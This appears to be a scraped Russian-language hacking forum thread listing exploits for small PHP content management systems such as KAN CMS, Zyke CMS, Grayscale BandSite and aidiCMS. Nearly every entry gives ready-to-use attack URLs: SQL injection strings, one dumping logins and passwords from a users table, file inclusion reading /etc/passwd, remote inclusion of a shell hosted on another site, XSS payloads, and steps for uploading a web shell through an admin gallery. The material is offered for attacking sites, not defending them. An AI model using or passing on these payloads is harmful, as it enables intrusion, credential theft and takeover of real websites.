|
Puzzle Apps CMS 3.2
site:www.puzzleapps.org File Disclosure file: filepresenter.loader.php PHP код:
Код:
filepresenter.loader.php?getfile=../../[local_file]&filename=wtf.txt |
KAN CMS 1.0 beta
site: www.kancms.org SQL-Injection need: mq=off file: pages/sections.php PHP код:
Код:
/pages/sections.php?siteid=-kan'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+--+&mid=3&sid=6Код:
/pages/sections.php?siteid=kan&mid=-1+union+select+1,2,3,4,5,6,7,8,9+--+&sid=6Код:
http://www.kancms.org/pages/sections.php?siteid=kan&mid=-3+/*!union*/+select+1,2,3,4,5,6,7,8,9+--+&sid=6//Двойной запрос, можно шелл залить Ctacok // а так не залить что-ли, если требования mq=off? Jokester |
Moa Gallery v1.2.2 (Updated 2010-06-17)
http://sourceforge.net/projects/moagallery/ В скриптах выставлена защита PHP код:
sources/mod_main_funcs.php PHP код:
rg=on http://localhost/Moa-1.2.2/sources/mod_main_funcs.php?CFG[MOA_PATH]=http://site.com/shell.txt%00 В версиях ниже 1.2.1 скрипт отсутствует. |
Zyke CMS 1.1
site:www.zykecms.com Authorization bypass need: mq=off file: index.php PHP код:
Код HTML:
need: mq=off file: index.php PHP код:
Код:
/index.php?p=content&id=-home'+union+select+1,2,concat_ws(0x3a,id,login,password),4,5,6,7+from+users--+need: mq=off file: index.php :d PHP код:
Код:
/index.php?p=../../[local_file]%00&id=home |
PhpBpCms
Download: http://sourceforge.net/projects/phpbpcms/ Vuln: Local Files Include Need: magic_quotes_gpc = Off file: index.php PHP код:
Код:
/index.php?module=[local_file]%00 |
Grayscale BandSite CMS Ver. 1.1.4
Site: http://sourceforge.net/projects/bandsitecms/ SQL-иньекция(-): Уязвимый файл: ./includes/content/interview_content.php PHP код:
./interviews.php?intid=-2+union+select+1,2,^,^,5,6,^,8,9,10 SQL-иньекция(-): Уязвимый файл: ./includes/content/lyrics_content.php PHP код:
Эксплуатация: /lyrics.php?sid=1+union+select+1,2,^,4,5,6,^,8,9 |
Grayscale BandSite CMS Ver. 1.1.4
SQL Injection: /members.php?memid=-1+union+select+1,2,user(),version(),database(),6,7 +--+ PHP код:
/reviews.php?filter=alert(); SQL Injection: /reviews.php?filter=-1'+union+select+1,version(),3,4,5,6,database(),8,u ser(),10,11+--+ Код: PHP код:
/adminpanel/index.php?action=addphotos Выбираем шелл, заливаем. Далее > /adminpanel/preview.php?cat=prevphotos Ищем в сорсах: /images/gallery/*** У меня к примеру: /images/gallery/thm_300_wso2pack.jpg.php Убираем thm_300_. /images/gallery/wso2pack.jpg.php Шелленг |
Travelsized CMS 0.4.1
Site: http://sourceforge.net/projects/uberghey/ RFI(rg==on): frontpage.php PHP код:
./frontpage.php?setup_folder=data:, LFI(mq == off): index.php PHP код:
./index.php?page_id=0&language=../../../../../../../../etc/passwd%00// Вот здесь, я невижу где уязвимость в коде Инклудится "frontpage.php", его код выше ^^ // Это я вижу, но причём тогда здесь language?) $language = $_REQUEST['language'];include("$setup_folder/i18n/$language/$page_id.inc"); Может так нагляднее =) // Теперь нормально, а так-же пользуясь случаем, передаю привет всем всем всем. |
IROKEZBLOG
XSS passive: http://localhost/feedback/ Уязвимые поля: Цитата:
Код:
">alert(); |
Zeti CMS 1.0.1
Download: http://sourceforge.net/projects/zeticms/ SQL-иньекция(-): Уязвимый файл: ./viewArticle.php Код: PHP код:
./viewArticle.php?id=-1+union+select+^,^ aidiCMS v1.0 Download: http://code.google.com/p/aidicms/ LFI(-): Уязвимый файл: ./style.php Код: PHP код:
http://[host]/style.php?filename=../../../../../../../../../../../etc/passwd |
| Время: 10:34 |